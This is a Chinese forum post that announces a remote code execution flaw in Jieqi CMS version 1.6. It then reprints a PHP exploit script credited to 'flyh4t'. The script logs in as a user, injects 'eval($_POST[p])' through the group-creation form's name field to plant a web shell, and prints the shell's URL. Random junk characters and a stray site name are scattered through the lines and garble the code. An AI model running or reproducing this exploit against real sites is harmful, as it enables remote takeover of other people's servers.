杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
* [) w/ O+ v# H( q" o( a; g* [0 y" O8 W* F/ \* A; o+ a( B, b! z' a
6 }; }: | I* _; s) X. |该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
7 E2 X4 j4 [1 |' K 需要有一个能创建圈子的用户。
1 J" l4 E7 @7 o8 K) T
# a% |6 n! o, N* I: c% I<?php
2 J; F4 ]& W5 m& N0 l
( D8 w$ k; \& c# `3 `) Vprint_r('
0 y2 |# _4 I4 h, v+---------------------------------------------------------------------------+
" g! A' j0 B7 L' K6 b8 IJieqi CMS V1.6 PHP Code Injection Exploit/ V! m. o- C1 j" {8 M* J
by flyh4t" p `( W' d* b6 v [& ]: p
mail: phpsec at hotmail dot com
* E( W7 |8 {4 c( g; T$ |team: http://www.wolvez.org
$ w" B8 V9 C9 L. P2 k+---------------------------------------------------------------------------+
' w! q2 E. o' \'); /**4 a: h" P4 D) A! J7 [1 \
* works regardless of php.ini settings
! K1 R$ ^7 C* j) }2 S*/ if ($argc < 5) { print_r('& O# c9 F* f3 H C4 w
+---------------------------------------------------------------------------+
& F+ H5 a0 r8 O& p) s$ q- r) kUsage: php '.$argv[0].' host path username- g4 B6 ^1 L$ E5 i4 a A
host: target server (ip/hostname)8 `8 B4 }3 j2 O
path: path to jieqicms
8 z+ O2 v, O o: wuasename: a username who can create group. `) ?- j" z! w2 }
Example:, t* L* D4 _+ e2 F \4 N2 o7 `0 I
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password; G' d+ l C3 n6 w+ `- u
+---------------------------------------------------------------------------+
' J. l" F. Z5 I9 A'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961! G; @# B1 J+ V v0 P
Content-Disposition: form-data; name="gname". @& E5 @( F6 Z) U1 [& m
% u8 e& r4 E) y& m2 b) ]'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
g5 U6 X: ]' s7 @* V-----------------------------23281168279961
; ?9 n. l5 P. CContent-Disposition: form-data; name="gcatid"- T' W5 e. Y y1 ^$ X
7 e; c9 f$ r" M
1
( K6 G9 K" T- d, Z' u# Z-----------------------------23281168279961
6 T |! Q( o) B9 O1 u1 d3 _5 d5 @Content-Disposition: form-data; name="gaudit"# r! _9 q4 Q- n3 M) W1 C9 G
' o8 W) ~5 Y0 T6 q
1
$ W n( l8 ]# E E-----------------------------23281168279961
7 P' E: U; H; l$ GContent-Disposition: form-data; name="gbrief". k9 V4 g( E. m3 d
' _& z. e/ i, l% y
1! E2 L% V7 k, P, A, y# k
-----------------------------23281168279961--8 H8 e9 ~( L' z' q3 W
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com% e% f4 F0 ]/ ^$ ^* N
4 o+ V$ t, h& [) Y) J7 I9 f6 Qpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对